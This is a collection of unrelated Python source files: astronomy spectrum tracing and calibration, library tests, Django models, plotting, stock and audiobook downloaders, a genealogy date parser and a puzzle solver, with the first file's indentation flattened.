# reject outlier points (>1 pixel) and refit
res = model(cols)-ypos
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) & (np.abs(res)<1))[0]
model=(fitter(mod,cols[gd],ypos[gd]))
if len(gd) < 10 :
print(' failed trace for row: {:d}, using old model'.format(irow))
model=copy.copy(oldmodel[irow])
self.model.append(model)
if plot :
plot.ax.scatter(cols,ypos,marker='o',color='r',s=4)
plot.ax.scatter(cols[gd],ypos[gd],marker='o',color='g',s=4)
plot.ax.plot(cols,model(cols),color='m')
#plt.pause(0.05)
self.pix0=0
print("")
if plot : input(' See trace. Hit any key to continue....')
def retrace(self,hd,plot=None,thresh=20) :
""" Retrace starting with existing model
"""
self.find(hd)
srows = []
for row in range(len(self.model)) :
srows.append(self.model[row](self.sc0))
self.trace(hd,srows,plot=plot,thresh=thresh)
def find(self,hd,lags=None,plot=None) :
""" Determine shift from existing trace to input frame
"""
if lags is None : lags = self.lags
im=copy.deepcopy(hd.data)
# if we have a window, zero array outside of window
spec=im[:,self.sc0]
try:
spec[:self.rows[0]] = 0.
spec[self.rows[1]:] = 0.
except: pass
fitpeak,shift = image.xcorr(self.spectrum,spec,lags)
pixshift=(fitpeak+lags[0])[0]
print(' traces shift: ', fitpeak+lags[0])
if plot is not None :
plot.clear()
plot.tv(im)
plot.plotax1.cla()
plot.plotax1.text(0.05,0.95,'obj and ref cross-section',transform=plot.plotax1.transAxes)
plot.plotax1.plot(self.spectrum.data/self.spectrum.data.max())
plot.plotax1.plot(im[:,self.sc0]/im[:,self.sc0].max())
plot.plotax1.set_xlabel('row')
plot.plotax2.cla()
plot.plotax2.text(0.05,0.95,'cross correlation {:8.3f}'.format(pixshift),
transform=plot.plotax2.transAxes)
plot.plotax2.plot(lags,shift)
plot.plotax2.set_xlabel('lag')
plt.draw()
input(' See spectra and cross-correlation. Hit any key to continue....')
self.pix0=fitpeak+lags[0]
return fitpeak+lags[0]
def extract(self,hd,rad=None,scat=False,plot=None,medfilt=None) :
""" Extract spectrum given trace(s)
"""
if rad is None : rad=self.rad
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
spec = np.zeros([len(self.model),hd.data.shape[1]])
sig = np.zeros([len(self.model),hd.data.shape[1]])
mask = np.zeros([len(self.model),hd.data.shape[1]],dtype=bool)
if plot is not None:
plot.clear()
plot.tv(hd)
for i,model in enumerate(self.model) :
print(' extracting aperture {:d}'.format(i),end='\r')
cr=model(np.arange(ncols))+self.pix0
icr=np.round(cr).astype(int)
rfrac=cr-icr+0.5 # add 0.5 because we rounded
rlo=[]
rhi=[]
for col in range(ncols) :
r1=icr[col]-rad
r2=icr[col]+rad
# sum inner pixels directly, outer pixels depending on fractional pixel location of trace
if r1>=0 and r2<nrows :
spec[i,col]=np.sum(hd.data[r1+1:r2,col])
sig[i,col]=np.sum(hd.uncertainty.array[r1+1:r2,col]**2)
spec[i,col]+=hd.data[r1,col]*(1-rfrac[col])
sig[i,col]+=hd.uncertainty.array[r1,col]**2*(1-rfrac[col])
spec[i,col]+=hd.data[r2,col]*rfrac[col]
sig[i,col]+=hd.uncertainty.array[r2,col]**2*rfrac[col]
sig[i,col]=np.sqrt(sig[i,col])
mask[i,col] = np.any(hd.mask[r1:r2+1,col])
if plot is not None :
rlo.append(r1)
rhi.append(r2-1)
if medfilt is not None :
boxcar = Box1DKernel(medfilt)
median = convolve(spec[i,:],boxcar,boundary='extend')
spec[i,:]/=median
sig[i,:]/=median
if plot is not None :
if i%2 == 0 : color='b'
else : color='m'
plot.ax.plot(range(ncols),cr,color='g',linewidth=3)
plot.ax.plot(range(ncols),rlo,color=color,linewidth=1)
plot.ax.plot(range(ncols),rhi,color=color,linewidth=1)
plt.draw()
if plot is not None : input(' See extraction window(s). Hit any key to continue....')
print("")
return CCDData(spec,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def extract2d(self,hd,rows=None,plot=None) :
""" Extract 2D spectrum given trace(s)
Assumes all requests row uses same trace, just offset, not a 2D model for traces
"""
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
out=[]
if plot is not None:
plot.clear()
plot.tv(hd)
for model in self.model :
if plot is not None :
plot.ax.plot([0,ncols],[self.rows[0],self.rows[0]],color='g')
plot.ax.plot([0,ncols],[self.rows[1],self.rows[1]],color='g')
plt.draw()
outrows=np.arange(self.rows[0],self.rows[1])
noutrows=len(range(self.rows[0],self.rows[1]))
spec=np.zeros([noutrows,ncols])
sig=np.zeros([noutrows,ncols])
cr=model(np.arange(ncols))
cr-=cr[self.sc0]
for col in range(ncols) :
spec[:,col] = np.interp(outrows+cr[col],np.arange(nrows),hd.data[:,col])
sig[:,col] = np.sqrt(np.interp(outrows+cr[col],np.arange(nrows),hd.uncertainty.array[:,col]**2))
out.append(CCDData(spec,StdDevUncertainty(sig),unit='adu'))
if plot is not None: input(' enter something to continue....')
if len(out) == 1 : return out[0]
else : return out
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
def mash(hd,sp=None,bks=None) :
"""
Mash image into spectra using requested window
"""
if sp is None :
sp=[0,hd.data.shape[0]]
obj = hd.data[sp[0]:sp[1]].sum(axis=0)
obj = hd.data[sp[0]:sp[1]].sum(axis=0)
if bks is not None :
back=[]
for bk in bks :
tmp=np.median(data[bk[0]:bk[1]],axis=0)
back.append(tmp)
obj-= np.mean(back,axis=0)
return obj
def wavecal(hd,file=None,wref=None,disp=None,wid=[3],rad=5,snr=3,degree=2,wcal0=None,thresh=100,type='poly'):
"""
Get wavelength solution for single 1D spectrum
"""
# choose middle row +/ 5 rows
sz=hd.data.shape
spec=hd.data[int(sz[0]/2)-5:int(sz[0]/2)+5,:].sum(axis=0)
spec=spec-scipy.signal.medfilt(spec,kernel_size=101)
pix = np.arange(len(spec))
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,6))
ax[0].plot(spec)
# get wavelength guess from input WaveCal if given, else use wref and dispersion, else header
if wcal0 is not None :
lags=range(-300,300)
fitpeak,shift = image.xcorr(wcal0.spectrum,spec,lags)
wnew=copy.deepcopy(wcal0)
wnew.pix0 = wcal0.pix0+shift.argmax()+lags[0]
print(' Derived pixel shift from input wcal0: ',shift.argmax()+lags[0])
wav=wnew.wave(pix)
else :
# get dispersion guess from header cards if not given in disp
if disp is None: disp=hd.header['DISPDW']
if wref is not None :
w0=wref[0]
pix0=wref[1]
wav=w0+(pix-pix0)*disp
else:
w0=hd.header['DISPWC']
pix0=sz[1]/2
wav=w0+(pix-pix0)*disp
ax[1].plot(wav,spec)
# open file with wavelengths and read
f=open(file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
name=line[10:].strip()
lpix=abs(w-wav).argmin()
if lpix > 1 and lpix < sz[1]-1 :
ax[0].text(lpix,0.,'{:7.1f}'.format(w),rotation='vertical',va='top',ha='center')
lines.append(w)
lines=np.array(lines)
f.close()
# get centroid around expected lines
cents=[]
for line in lines :
peak=abs(line-wav).argmin()
if (peak > rad) and (peak < sz[1]-rad) and (spec[peak-rad:peak+rad].max() > thresh) :
print(peak,spec[peak-rad:peak+rad].max())
cents.append((spec[peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spec[peak-rad:peak+rad].sum())
cents=np.array(cents)
print(' cents:', cents)
waves=[]
weight=[]
print(' Centroid W0 Wave')
for cent in cents :
w=wav[int(cent)]
ax[0].plot([cent,cent],[0,10000],'k')
print(' {:8.2f}{:8.2f}{:8.2f}'.format(cent, w, lines[np.abs(w-lines).argmin()]))
waves.append(lines[np.abs(w-lines).argmin()])
weight.append(1.)
waves=np.array(waves)
weight=np.array(weight)
# set up new WaveCal object
pix0 = int(sz[1]/2)
wcal = WaveCal(order=degree,type=type,spectrum=spec,pix0=pix0)
# iterate allowing for interactive removal of points
done = False
ymax = ax[0].get_ylim()[1]
while not done :
gd=np.where(weight>0.)[0]
bd=np.where(weight<=0.)[0]
wcal.fit(cents[gd],waves[gd],weights=weight[gd])
# plot
ax[1].cla()
ax[1].plot(cents[gd],wcal.wave(cents[gd])-waves[gd],'go')
if len(bd) > 0 : ax[1].plot(cents[bd],wcal.wave(cents[bd])-waves[bd],'ro')
diff=wcal.wave(cents[gd])-waves[gd]
ax[1].set_ylim(diff.min()-1,diff.max()+1)
for i in range(len(cents)) :
ax[1].text(cents[i],wcal.wave(cents[i])-waves[i],'{:2d}'.format(i),va='top',ha='center')
if weight[i] > 0 :
ax[0].plot([cents[i],cents[i]],[0,ymax],'g')
else :
ax[0].plot([cents[i],cents[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(cents)) :
print(' {:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, cents[i], wcal.wave(cents[i]), waves[i], waves[i]-wcal.wave(cents[i]),weight[i]))
print(' rms: {:8.2f} Anstroms'.format(diff.std()))
i = input('enter ID of line to remove (-n for all lines<n, +n for all lines>n, return to continue): ')
if i is '' :
done = True
elif '+' in i :
weight[int(i)+1:] = 0.
elif '-' in i :
weight[0:abs(int(i))] = 0.
elif int(i) >= 0 :
weight[int(i)] = 0.
else :
print('invalid input')
plt.close()
return wcal.wave(pix),wcal
def fluxcal(obs,wobs,file=None) :
"""
flux calibration
"""
fluxdata=ascii.read(file)
stan=np.interp(wobs,fluxdata['col1'],fluxdata['col2'])
return stan/obs
def trace(hd,apertures=None,pix0=1024) :
""" Get all traces
apertures is a list of row numbers at pixel 1024
"""
alltr=[]
for i in range(len(apertures)) :
tr=Trace()
print('tracing aperture {:d}'.format(i),end='\r')
sr=apertures[i]
tr.trace(hd,pix0,sr)
alltr.append(tr)
return alltr
def extract(hd,apertures) :
""" Do all extractions
"""
spec = np.zeros([len(apertures),hd.data.shape[1]])
for i,order in enumerate(apertures) :
print('extracting aperture {:d}'.format(i),end='\r')
spec[i] = order.extract(hd)
return spec
| 36,064 | 12,541 |
# Copyright (c) 2022 Massachusetts Institute of Technology
# SPDX-License-Identifier: MIT
from dataclasses import is_dataclass
import pytest
from hydra_zen import hydrated_dataclass, instantiate
def f1(x, y):
pass
def f2(x, y, z):
return x, y, z
@pytest.mark.parametrize("conf2_sig", [True, False])
@pytest.mark.parametrize("conf3_sig", [True, False])
def test_chained_inheritance(conf2_sig, conf3_sig):
@hydrated_dataclass(f1)
class Conf1:
x: int = 1
@hydrated_dataclass(f1, populate_full_signature=conf2_sig)
class Conf2(Conf1):
y: int = 2
@hydrated_dataclass(f2, populate_full_signature=True)
class Conf3(Conf2):
z: int = 3
assert is_dataclass(Conf1)
assert is_dataclass(Conf2)
assert is_dataclass(Conf3)
assert issubclass(Conf2, Conf1)
assert issubclass(Conf3, Conf1)
assert issubclass(Conf3, Conf2)
assert instantiate(Conf3) == (1, 2, 3)
def test_pos_args():
@hydrated_dataclass(f2, 1, 2)
class Conf:
z: int = 3
assert instantiate(Conf) == (1, 2, 3)
| 1,075 | 430 |
print("Hello World!")
#because why the hell not that's why. It was like a free
#point on Kattis. Actually got a compiler error on my first
#try because I was new to Python3 at the time. | 185 | 54 |
from django.db import models
from forex.models import Currency
class Country(models.Model):
"""
Represents a country, such as the US, or Mexico.
"""
name = models.CharField(max_length=255, blank=True, null=True, help_text="Official Country name (ISO Full name)")
currency = models.ManyToManyField(Currency, help_text="Official currencies for this country. More than one currency is possible")
symbol_alpha2_code = models.CharField(help_text="ISO 3166-1 alpha-2 symbol", max_length=2, unique=True)
symbol_alpha3_code = models.CharField(help_text="ISO 3166-1 alpha-3 symbol", max_length=3, unique=True)
is_independent = models.BooleanField()
numeric_code = models.PositiveSmallIntegerField()
remark_1 = models.TextField(blank=True)
remark_2 = models.TextField(blank=True)
remark_3 = models.TextField(blank=True)
territory_name = models.TextField(blank=True)
ISO_STATUS_CHOICES = (
(u'EXR', u'Exceptionally reserved'),
(u'FRU', u'Formerly used'),
(u'INR', u'Indeterminately reserved'),
(u'OFF', u'Officially assigned'),
(u'TRR', u'Transitionally reserved'),
(u'UND', u'Unassigned'),
)
iso_status = models.CharField(max_length=3, choices=ISO_STATUS_CHOICES, default="UND")
# Additional helpful fields
common_name = models.CharField(max_length=255, unique=True, help_text="Common Country name")
in_name = models.CharField(max_length=255, help_text="The name of the country after the word 'in'. Useful for Autogeneration.")
class Meta:
verbose_name_plural = 'Countries'
verbose_name = 'Country'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.common_name))
class Region(models.Model):
"""
Represents a region, such as the Latin America, or Europe.
"""
name = models.CharField(max_length=255, unique=True)
country = models.ManyToManyField(Country)
symbol = models.CharField(max_length=4)
class Meta:
verbose_name_plural = 'Regions'
verbose_name = 'Region'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.name))
class City(models.Model):
"""
Represents a city within a country
"""
name = models.CharField(max_length=255)
symbol = models.CharField(max_length=255, blank=True)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Cities'
verbose_name = 'City'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s, %s' % (unicode(self.name), unicode(self.country.name))
class Government(models.Model):
"""
Represents a government of a country, such as the
'Government of Australia'.
"""
name = models.CharField(max_length=255)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Governments'
verbose_name = 'Government'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s' % (unicode(self.name))
| 3,165 | 1,019 |
import argparse
from pathlib import Path
import json
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
def main(input_file: Path, output_file: Path) -> None:
with input_file.open('r') as fp:
data = json.load(fp)
plt.figure(figsize=(20, 13))
rcParams['font.family'] = 'serif'
rcParams['font.serif'] = 'Times New Roman'
plt.tick_params(left=False, bottom=False)
sns.heatmap(data['z'][::-1], xticklabels=data['x'], yticklabels=data['y'][::-1], cmap='mako_r') # YlGnBu_r, mako_r
plt.savefig(output_file, bbox_inches='tight', dpi=150)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input', type=Path, help='Input JSON file, generated by process.py')
parser.add_argument('output', type=Path, help='Output file containing the figure')
args = parser.parse_args()
main(args.input, args.output)
| 920 | 331 |
from ptrait import TraitExtends
import copy
from pytest_assertutil import assert_equal
class IntfA:
@classmethod
@TraitExtends.mark
def a_classmethodA(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodA(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodA(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
class IntfB:
@classmethod
@TraitExtends.mark
def a_classmethodB(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodB(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodB(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.cascade(IntfA, IntfB)
class A:
pass
def test_cascade_call_instanceA():
assert_equal(
((), {'a': 1}),
A().a_instancemethodA()
)
def test_cascade_call_instanceB():
assert_equal(
((), {'a': 2}),
A().a_instancemethodB()
)
def test_cascade_call_instanceC():
assert_equal(
((), {'a': 3}),
A().a_instancemethodC()
)
def test_cascade_call_staticmethodA():
assert_equal(
((), {'a': 1}),
A.a_staticmethodA()
)
def test_cascade_call_staticmethodB():
assert_equal(
((), {'a': 2}),
A.a_staticmethodB()
)
def test_cascade_call_staticmethodC():
assert_equal(
((), {'a': 3}),
A.a_staticmethodC()
)
def test_cascade_call_classmethodA():
assert_equal(
((), {'a': 1}),
A.a_classmethodA()
)
def test_cascade_call_classmethodB():
assert_equal(
((), {'a': 2}),
A.a_classmethodB()
)
def test_cascade_call_classmethodC():
assert_equal(
((), {'a': 3}),
A.a_classmethodC()
)
| 3,436 | 1,307 |
import yahoo_fin.stock_info as si
import pandas as pd
import os
def download_data(etfs, time_frames):
# ่ทๅๆฐๆฎๅนถๅญๅจ
if not os.path.exists('./Data'):
os.makedirs('./Data')
if not os.path.exists('./Data/rawdata'):
os.makedirs('./Data/rawdata')
for ticker in etfs:
for interval in time_frames:
historical_price = pd.DataFrame()
print("This is a ticker ",ticker, interval)
historical_price = si.get_data(ticker, interval=interval)
# delete column 'ticker'
historical_price = historical_price.drop(["ticker"], axis=1)
# use date as index of the dataframe
historical_price.index.name = "date"
if interval == "1d":
interval = "daily"
elif interval == "1wk":
interval = "weekly"
# ๅ ้คๆๅไธ่กๆ่
ๅๆฐ็ฌฌไบ่ก
if historical_price.isnull().any().sum() > 0:
historical_price.dropna(how='any', inplace=True)
else:
historical_price = historical_price.iloc[:-1]
else:
# ๅ ้คๆๅไธ่กๆ่
ๅๆฐ็ฌฌไบ่ก
if historical_price.isnull().any().sum() > 0:
historical_price.dropna(how='any', inplace=True)
else:
historical_price = historical_price.iloc[:-1]
interval = "monthly"
# sava files
historical_price.to_csv("./data/rawdata/" + ticker + "_" + interval + ".csv") | 1,526 | 456 |
import datetime
import re
import os
import logging
import json
_months = [
"JAN",
"FEB",
"MAR",
"APR",
"MAY",
"JUN",
"JUL",
"AUG",
"SEP",
"OCT",
"NOV",
"DEC"
]
_precision = [
'ABT',
'CAL',
'EST',
'AFT',
'BEF'
]
_date_expr = re.compile('(?:(' + '|'.join(_precision) + ') )?(?:(\\d+) )?(?:(' + '|'.join(_months) + ') )?(\\d{4})')
_interval_expr = re.compile('(BET) (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4}) AND (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4})')
_max_days = {
1:31,
2:29,
3:31,
4:30,
5:31,
6:30,
7:31,
8:31,
9:30,
10:31,
11:30,
12:31
}
def get_date_dict_from_tag(parent_item, tag_name):
"""
read the date from a gedcom tag
Args:
parent_item (dict): parent event node to output the result
tag_name (str): event type
"""
# TODO: Implement BET = Between
try:
if tag_name not in parent_item:
return
if 'DATE' not in parent_item[tag_name]:
return
comment = None
precision = ''
content = parent_item[tag_name]['DATE']['tag_data']
date_info = _date_expr.match(content)
if date_info is None:
date_info = _interval_expr.match(content)
if date_info.group(1) == 'EST':
comment = 'Estimated'
elif date_info.group(1) == 'ABT':
comment = 'About'
elif date_info.group(1) == 'CAL':
comment = 'Calculated'
elif date_info.group(1) == 'AFT':
comment = 'After'
elif date_info.group(1) == 'BEF':
comment = 'Before'
elif date_info.group(1) == 'BET':
comment = 'Between'
elif date_info.group(2) is None and date_info.group(3) is None and date_info.group(4) is not None:
comment = 'YearPrecision'
month_max_, day_max_ = 12, 31
month_min_, day_min_ = 1, 1
year_min, year_max = None, None
month_max, day_max = None, None
month_min, day_min = None, None
if date_info.group(1) == 'BET':
if date_info.group(7):
year_max = int(date_info.group(7))
if date_info.group(6):
month_max = _months.index(date_info.group(6)) + 1
if date_info.group(5):
day_max = int(date_info.group(5))
if date_info.group(4):
year_min = int(date_info.group(4))
if not year_max:
year_max = year_min
precision = 'y' + precision
if date_info.group(3):
month_min = _months.index(date_info.group(3)) + 1
if not month_max:
month_max = month_min
precision = 'm' + precision
if date_info.group(2):
day_min = int(date_info.group(2))
if not day_max:
day_max = day_min
precision = 'd' + precision
if date_info.group(1) == 'AFT':
year_max = year_min + 15
elif date_info.group(1) == 'BEF':
year_min = year_max - 15
if not month_max: month_max = month_max_
if not month_min: month_min = month_min_
if not day_max: day_max = day_max_
if not day_min: day_min = day_min_
day_max = min(_max_days[month_max], day_max)
date_min = datetime.datetime(year_min, month_min, day_min, 0, 0, 0, 0)
try:
date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
except ValueError as e:
if month_max==2:
date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
else:
raise
if tag_name in ['BURI', 'DEAT']:
# if unknown move to the end of the year
date = date_max
else:
# if unknown move to the beginning of the year
date = date_min
return {
'tag_name': tag_name,
'date': date,
'ordinal_value': date.toordinal(),
'ordinal_value_max': date_max.toordinal(),
'ordinal_value_min': date_min.toordinal(),
'comment': comment,
'precision' : precision
}
except:
pass
def _get_relevant_events(database_indi, individual_id, target):
parent_item = database_indi[individual_id].get('BIRT')
if parent_item:
target['birth'] = get_date_dict_from_tag(
database_indi[individual_id], 'BIRT')
if target['birth'] is None:
target.pop('birth')
parent_item = database_indi[individual_id].get('CHR')
if parent_item:
target['christening'] = get_date_dict_from_tag(
database_indi[individual_id], 'CHR')
if target['christening'] is None:
target.pop('christening')
parent_item = database_indi[individual_id].get('BAPM')
if parent_item:
target['baptism'] = get_date_dict_from_tag(
database_indi[individual_id], 'BAPM')
if target['baptism'] is None:
target.pop('baptism')
parent_item = database_indi[individual_id].get('DEAT')
if parent_item:
target['death'] = get_date_dict_from_tag(
database_indi[individual_id], 'DEAT')
if target['death'] is None:
target.pop('death')
parent_item = database_indi[individual_id].get('BURI')
if parent_item:
target['burial'] = get_date_dict_from_tag(
database_indi[individual_id], 'BURI')
if target['burial'] is None:
target.pop('burial')
if 'birth' in target:
target['birth_or_christening'] = target['birth']
elif 'birth_or_christening' not in target and 'christening' in target:
target['birth_or_christening'] = target['christening']
elif 'birth_or_christening' not in target and 'baptism' in target:
target['birth_or_christening'] = target['baptism']
else:
target['birth_or_christening'] = None
if 'death' in target:
target['death_or_burial'] = target['death']
elif 'death_or_burial' not in target and 'burial' in target:
target['death_or_burial'] = target['burial']
else:
target['death_or_burial'] = None
def estimate_marriage_date(family):
"""
If the marriage date is unknown, then estimate the date by assuming:
- the marriage took place before the first child was born
Args:
family (BaseFamily): family instance
"""
if family.marriage is None:
children_events = []
for child in family.children_individual_ids:
child_events = {}
_get_relevant_events(family._database_indi, child, child_events)
if child_events['birth_or_christening']:
children_events.append(child_events['birth_or_christening'])
# unsorted_marriages = [family._instances[('f',m)] for m in family._marriage_family_ids]
if len(children_events) > 0:
sorted_pairs = list(zip([(m['ordinal_value'], i) for i, m in enumerate(
children_events)], children_events))
sorted_pairs.sort()
family.marriage = sorted_pairs[0][1]
| 7,220 | 2,445 |
from HTMLParser import HTMLParser
import json
from os import makedirs
from os.path import abspath, dirname, exists, join, normpath
import pycurl
import Queue
import re
import requests
import tempfile
import urllib2
class HimalayanDownloader:
def __init__(self, eBookUrl, logger):
self._logger = logger
self._eBookUrl = eBookUrl
self._failedTracksQueue = None
self._downloadQueue = Queue.Queue()
self._completedQueue = Queue.Queue()
self._maxTrial = 10
self._trial = 0
self._hp = HTMLParser()
self._trackUrlDir = 'http://www.ximalaya.com/tracks/'
self._bookName = self.getBookName()
def getBookName(self):
response = urllib2.urlopen(self._eBookUrl)
html = response.read()
pattern = re.compile('<h1>(.*?)</h1>', re.S)
rawName = re.findall(pattern, html)[0].decode('utf-8')
return self._hp.unescape(rawName).replace(':', '_')
def download(self):
self._logger.info('Downloading book <<' + self._bookName + '>>')
currPath = join(dirname(abspath(__file__)), '..')
bookPath = normpath(join(currPath, self._bookName))
self._logger.info('Files can be found in: ' + bookPath)
if not exists(bookPath):
makedirs(bookPath)
self.fetchTracks()
while self._trial < self._maxTrial:
self._failedTracksQueue = Queue.Queue()
while not self._downloadQueue.empty():
track = self._downloadQueue.get()
self.downloadTrack(track[0], track[1])
if self._failedTracksQueue.empty():
break
else:
self._downloadQueue = self._failedTracksQueue
self._trail += 1
self._logger.info('Finished downloading book <<' + self._bookName + '>>')
return self._completedQueue
def downloadTrack(self, url, fileName):
self._logger.info('Downloading track: ' + fileName)
self._logger.debug('Track URL: ' + url)
tmpFileName = url.split('/')[-1]
tmpFilePath = normpath(join(tempfile.gettempdir(), tmpFileName))
with open(tmpFilePath, 'wb') as f:
c = pycurl.Curl()
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, f)
try:
c.perform()
except pycurl.error as e:
self._logger.error('ERROR occurred: ' + e.message)
self._logger.debug('Adding "' + fileName + '" to re-download tasks')
self._failedTracksQueue.put((url, fileName))
else:
c.close()
self._completedQueue.put((tmpFilePath, self._bookName, fileName))
def fetchTracks(self):
pageNum = 1
trackQueue= Queue.Queue()
while True:
pageUrl = self._eBookUrl + '?page=%d' % pageNum
self._logger.debug('Fetching page: ' + pageUrl)
response = urllib2.urlopen(pageUrl)
html = response.read()
self._logger.debug('Analyzing page: ' + pageUrl)
pattern = re.compile('<a class="title" href="(.*?)" hashlink title="(.*?)">', re.S)
results = re.findall(pattern, html)
if not results:
break
for result in results:
trackQueue.put(result)
pageNum += 1
indexLength = len(str(trackQueue.qsize()))
index = 0
while not trackQueue.empty():
index += 1
track = trackQueue.get()
jsonUrl = self._trackUrlDir + track[0].split('sound/')[-1] + '.json'
self._logger.debug('Loading JSON: ' + jsonUrl)
resp = requests.get(url=jsonUrl)
data = json.loads(resp.text)
fileName = self._bookName + '_' + str(index).zfill(indexLength) + '_'
fileName += self._hp.unescape(track[1].decode('utf-8')).replace(':', '_')
url = data['play_path']
self._downloadQueue.put((url, fileName))
| 4,020 | 1,165 |
import re
import copy
import hashlib
class Node:
def __init__(self, line):
m = re.match(r"\/dev\/grid\/node-x(\d+)-y(\d+)\s+(\d+)T\s+(\d+)T\s+(\d+)T\s+(\d+)%", line)
if m is None:
self.valid = False
return
self.valid = True
self.x = int(m.group(1))
self.y = int(m.group(2))
self.size = int(m.group(3))
self.used = int(m.group(4))
self.goal = False
def avail(self):
return self.size - self.used
def empty(self):
return self.used == 0
def start(self):
return self.x == 0 and self.y == 0
def __str__(self):
return "(%d, %d)" % (self.x, self.y)
def __repr__(self):
return self.__str__()
def __cmp__(self, other):
c = self.x - other.x
if c == 0:
return self.y - other.y
return c
def __ne__(self, other):
return not self.__eq__(other)
def part1():
with open("inputs/day22.txt") as f:
all_nodes = []
for line in f:
n = Node(line)
if n.valid:
all_nodes.append(n)
viable = []
for a in all_nodes:
for b in all_nodes:
if a == b or a.empty():
continue
if a.used < b.avail():
viable.append((a, b))
print "Part1:", len(viable)
class Grid:
def __init__(self, filename):
self.grid = {}
self.goal = None
self.emptyNode = None
self.steps = 0
with open(filename) as f:
for line in f:
n = Node(line)
if n.valid:
self.grid[str(n)] = n
if (self.goal is None):
n.goal = True
self.goal = n
elif (n.y == 0) and n.x > self.goal.x:
self.goal.goal = False
n.goal = True
self.goal = n
if n.empty():
self.emptyNode = n
def getHome(self):
return self.get("(0, 0)")
def get(self, s):
return self.grid.get(s, None)
def set(self, s, val):
self.grid[s] = val
def __str__(self):
return str(self.grid)
def __repr__(self):
return self.__str__()
def hash(self):
m = hashlib.md5()
for key in self.grid:
node = self.grid[key]
m.update("(%d,%d,%d,%d)" % (node.x, node.y, node.size, node.used))
return m.digest()
def draw(self):
print "######################\n"
y = 0
broken = 0
while True:
x = 0
while True:
n = self.get("(%d, %d)" % (x, y))
if n is not None:
broken = 0
c = None
if n.goal:
c = "G"
elif n.empty():
c = "_"
else:
c = "."
if n.start():
print "(%s)" % c,
else:
print " %s " % c,
else:
broken += 1
print ""
break
x += 1
if broken == 2:
break
y += 1
print "######################"
def bfs(grid_list, steps=0, duplicates=[]):
if len(grid_list) == 0:
return -1
print "========================================="
print "BFS(%d): %d" % (steps, len(grid_list))
next_grids = []
for baseGrid in grid_list:
homeNode = baseGrid.getHome()
if homeNode.empty() and (baseGrid.get("(1, 0)").goal or baseGrid.get("(0, 1)").goal):
return steps+1
for (x, y) in [(-1, 0), (1, 0), (0, -1), (0, 1)]:
grid = copy.deepcopy(baseGrid)
empty = grid.emptyNode
nxt_str = "(%d, %d)" % (empty.x+x, empty.y+y)
nxt = grid.get(nxt_str)
if (nxt is not None) and (empty.size >= nxt.used):
empty.used = nxt.used
nxt.used = 0
if nxt.goal:
nxt.goal = False
empty.goal = True
grid.emptyNode = nxt
hsh = grid.hash()
if hsh not in duplicates:
duplicates.append(hsh)
next_grids.append(grid)
return bfs(next_grids, steps+1, duplicates)
def part2():
# this solution works for the sample data, but takes *forever* on the given data
# ended up using https://codepen.io/anon/pen/BQEZzK to come up with the final anser
grid = Grid("inputs/test.txt")
print "shortest: %d" % bfs([grid])
#grid.draw()
#part1()
part2() | 4,962 | 1,557 |
__author__ = 'wasi'
from .summary import *
from .code import *
| 64 | 23 |
from collections import defaultdict
from prometheus.utils.misc import FrozenClass
class RunnerState(FrozenClass):
"""
An object that is used to pass internal state during train/valid/infer.
"""
